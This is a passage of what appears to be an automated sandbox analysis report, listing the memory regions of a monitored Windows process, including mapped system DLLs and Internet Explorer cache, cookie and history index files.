1969 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1970 start_va = 0x7d0000 end_va = 0x950fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 1971 start_va = 0x960000 end_va = 0x1d5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 1972 start_va = 0x1d60000 end_va = 0x1f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 1973 start_va = 0x1a0000 end_va = 0x1a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1974 start_va = 0x1f0000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1975 start_va = 0x74820000 end_va = 0x749bdfff monitored = 0 entry_point = 0x7484e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1976 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1977 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1978 start_va = 0x1f10000 end_va = 0x21defff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1979 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1980 start_va = 0x74a50000 end_va = 0x74a5afff monitored = 0 entry_point = 0x74a51992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1981 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 1982 start_va = 0x270000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 1983 start_va = 0x2c0000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 1984 start_va = 0x1d60000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 1985 start_va = 0x1ed0000 end_va = 0x1f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 1986 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1987 start_va = 0x1e0000 end_va = 0x1e7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 1988 start_va = 0x2b0000 end_va = 0x2bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 1989 start_va = 0x747f0000 end_va = 0x74810fff monitored = 0 entry_point = 0x747f145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1990 start_va = 0x74d70000 end_va = 0x74db4fff monitored = 0 entry_point = 0x74d711e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 1991 start_va = 0x765f0000 end_va = 0x765f2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 1992 start_va = 0x3c0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 1993 start_va = 0x21e0000 end_va = 0x22dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021e0000" filename = "" Region: id = 1994 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1995 start_va = 0x74790000 end_va = 0x747e1fff monitored = 0 entry_point = 0x747914be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 1996 start_va = 0x74a30000 end_va = 0x74a44fff monitored = 0 entry_point = 0x74a312de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 1997 start_va = 0x74780000 end_va = 0x7478cfff monitored = 0 entry_point = 0x74781326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 1998 start_va = 0x5b0000 end_va = 0x5b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1999 start_va = 0x630000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 2000 start_va = 0x5b0000 end_va = 0x5b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2001 start_va = 0x74770000 end_va = 0x74775fff monitored = 0 entry_point = 0x7477125a region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll") Region: id = 2002 start_va = 0x5c0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 2003 start_va = 0x1e60000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 2004 start_va = 0x22e0000 end_va = 0x23dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 2005 start_va = 0x23e0000 end_va = 0x24dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 2006 start_va = 0x24e0000 end_va = 0x251ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 2007 start_va = 0x2520000 end_va = 0x261ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002520000" filename = "" Region: id = 2008 start_va = 0x74750000 end_va = 0x74766fff monitored = 0 entry_point = 0x74751c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 2009 start_va = 0x7efa7000 end_va = 0x7efa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 2010 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 2011 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 2012 start_va = 0x755e0000 end_va = 0x7560efff monitored = 0 entry_point = 0x755e2a35 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 2013 start_va = 0x74710000 end_va = 0x7474efff monitored = 0 entry_point = 0x74712351 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 2014 start_va = 0x74700000 end_va = 0x7470ffff monitored = 0 entry_point = 0x747038c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 2015 start_va = 0x2620000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2016 start_va = 0x2660000 end_va = 0x27cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002660000" filename = "" Region: id = 2017 start_va = 0x2660000 end_va = 0x274ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002660000" filename = "" Region: id = 2018 start_va = 0x27c0000 end_va = 0x27cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 2019 start_va = 0x746f0000 end_va = 0x746f5fff monitored = 0 entry_point = 0x746f14b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 2020 start_va = 0x600000 end_va = 0x600fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 2021 start_va = 0x2660000 end_va = 0x275ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002660000" filename = "" Region: id = 2022 start_va = 0x73440000 end_va = 0x73448fff monitored = 0 entry_point = 0x73441220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 2023 start_va = 0x610000 end_va = 0x617fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\urlmon.dll.mui") Region: id = 2024 start_va = 0x2760000 end_va = 0x279ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat") Region: id = 2025 start_va = 0x746b0000 end_va = 0x746ebfff monitored = 0 entry_point = 0x746b145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 2026 start_va = 0x27d0000 end_va = 0x298ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 2027 start_va = 0x746a0000 end_va = 0x746a4fff monitored = 0 entry_point = 0x746a15df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 2028 start_va = 0x74690000 end_va = 0x74695fff monitored = 0 entry_point = 0x74691673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 2029 start_va = 0x74650000 end_va = 0x74687fff monitored = 0 entry_point = 0x7465990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 2030 start_va = 0x27d0000 end_va = 0x280ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 2031 start_va = 0x2950000 end_va = 0x298ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002950000" filename = "" Region: id = 2032 start_va = 0x2810000 end_va = 0x284ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002810000" filename = "" Region: id = 2033 start_va = 0x2850000 end_va = 0x294ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002850000" filename = "" Region: id = 2034 start_va = 0x74630000 end_va = 0x74646fff monitored = 0 entry_point = 0x74633573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2035 start_va = 0x7efa4000 end_va = 0x7efa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 2036 start_va = 0x620000 end_va = 0x620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 2037 start_va = 0x620000 end_va = 0x620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 2038 start_va = 0x74620000 end_va = 0x74627fff monitored = 0 entry_point = 0x746234d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 2039 start_va = 0x620000 end_va = 0x621fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 2040 start_va = 0x74640000 end_va = 0x74647fff monitored = 0 entry_point = 0x746410e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 2041 start_va = 0x745e0000 end_va = 0x74617fff monitored = 0 entry_point = 0x745e1489 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 2042 start_va = 0x745c0000 end_va = 0x745d6fff monitored = 0 entry_point = 0x745c35fa region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2043 start_va = 0x74580000 end_va = 0x745bcfff monitored = 0 entry_point = 0x745810f5 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2044 start_va = 0x74560000 end_va = 0x74576fff monitored = 0 entry_point = 0x74563573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2045 start_va = 0x2990000 end_va = 0x29cbfff monitored = 0 entry_point = 0x299128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2046 start_va = 0x2990000 end_va = 0x29cbfff monitored = 0 entry_point = 0x299128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2047 start_va = 0x2990000 end_va = 0x29cbfff monitored = 0 entry_point = 0x299128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2048 start_va = 0x2990000 end_va = 0x29cbfff monitored = 0 entry_point = 0x299128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2049 start_va = 0x2990000 end_va = 0x29cbfff monitored = 0 entry_point = 0x299128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2050 start_va = 0x74520000 end_va = 0x7455afff monitored = 0 entry_point = 0x7452128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2051 start_va = 0x2990000 end_va = 0x2a8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 2052 start_va = 0x74500000 end_va = 0x74515fff monitored = 0 entry_point = 0x74502061 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\SysWOW64\\gpapi.dll" (normalized: "c:\\windows\\syswow64\\gpapi.dll") Region: id = 2329 start_va = 0x620000 end_va = 0x629fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 2330 start_va = 0x74e40000 end_va = 0x74e44fff monitored = 0 entry_point = 0x74e41438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 2331 start_va = 0x744e0000 end_va = 0x744f1fff monitored = 0 entry_point = 0x744e3271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 2332 start_va = 0x2a90000 end_va = 0x2c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a90000" filename = "" Region: id = 2333 start_va = 0x74460000 end_va = 0x744dffff monitored = 0 entry_point = 0x744737c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2334 start_va = 0x2c90000 end_va = 0x2e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c90000" filename = "" Region: id = 2335 start_va = 0x2c90000 end_va = 0x2d6efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c90000" filename = "" Region: id = 2336 start_va = 0x2e60000 end_va = 0x2e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e60000" filename = "" Region: id = 2337 start_va = 0x74440000 end_va = 0x74452fff monitored = 0 entry_point = 0x74441d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2338 start_va = 0x1ea0000 end_va = 0x1ea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mpr.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mpr.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mpr.dll.mui") Region: id = 2339 start_va = 0x2d70000 end_va = 0x2daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d70000" filename = "" Region: id = 2340 start_va = 0x2db0000 end_va = 0x2deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002db0000" filename = "" Region: id = 2341 start_va = 0x2ea0000 end_va = 0x2f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2342 start_va = 0x2fa0000 end_va = 0x309ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fa0000" filename = "" Region: id = 2343 start_va = 0x7ef9e000 end_va = 0x7efa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 2344 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 2345 start_va = 0x74630000 end_va = 0x74637fff monitored = 0 entry_point = 0x74631356 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\SysWOW64\\drprov.dll" (normalized: "c:\\windows\\syswow64\\drprov.dll") Region: id = 2346 start_va = 0x733f0000 end_va = 0x73418fff monitored = 0 entry_point = 0x733f6b19 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 2347 start_va = 0x74420000 end_va = 0x74433fff monitored = 0 entry_point = 0x744215c9 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\SysWOW64\\ntlanman.dll" (normalized: "c:\\windows\\syswow64\\ntlanman.dll") Region: id = 2348 start_va = 0x74400000 end_va = 0x74416fff monitored = 0 entry_point = 0x74401549 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\SysWOW64\\davclnt.dll" (normalized: "c:\\windows\\syswow64\\davclnt.dll") Region: id = 2349 start_va = 0x743f0000 end_va = 0x743f7fff monitored = 0 entry_point = 0x743f3c87 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 2350 start_va = 0x743e0000 end_va = 0x743eefff monitored = 0 entry_point = 0x743e12a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 2351 start_va = 0x743d0000 end_va = 0x743dafff monitored = 0 entry_point = 0x743d1200 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 2352 start_va = 0x743c0000 end_va = 0x743c8fff monitored = 0 entry_point = 0x743c15a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 2353 start_va = 0x743b0000 end_va = 0x743bcfff monitored = 0 entry_point = 0x743b12d0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 2355 start_va = 0x2620000 end_va = 0x2645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2356 start_va = 0x2650000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002650000" filename = "" Region: id = 2357 start_va = 0x742a0000 end_va = 0x742b0fff monitored = 0 entry_point = 0x742a1300 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 2358 start_va = 0x74280000 end_va = 0x74298fff monitored = 0 entry_point = 0x74281319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 2359 start_va = 0x1eb0000 end_va = 0x1ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 2360 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2361 start_va = 0x34b0000 end_va = 0x38bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000034b0000" filename = "" Region: id = 2362 start_va = 0x27a0000 end_va = 0x27b9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027a0000" filename = "" Region: id = 2363 start_va = 0x1eb0000 end_va = 0x1ec9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001eb0000" filename = "" Region: id = 2364 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2365 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2366 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2367 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2368 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2369 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2370 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2371 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2372 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2373 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2374 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2375 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2376 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2377 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2378 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2379 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2380 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2381 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2382 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2383 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2384 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2385 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2386 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2387 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2388 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2389 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2390 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2391 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2392 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2393 start_va = 0x30a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 2394 start_va = 0x1eb0000 end_va = 0x1ec9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001eb0000" filename = "" Region: id = 2395 start_va = 0x1eb0000 end_va = 0x1ec9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001eb0000" filename = "" Region: id = 2396 start_va = 0x1eb0000 end_va = 0x1ec9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001eb0000" filename = "" Region: id = 2397 start_va = 0x1eb0000 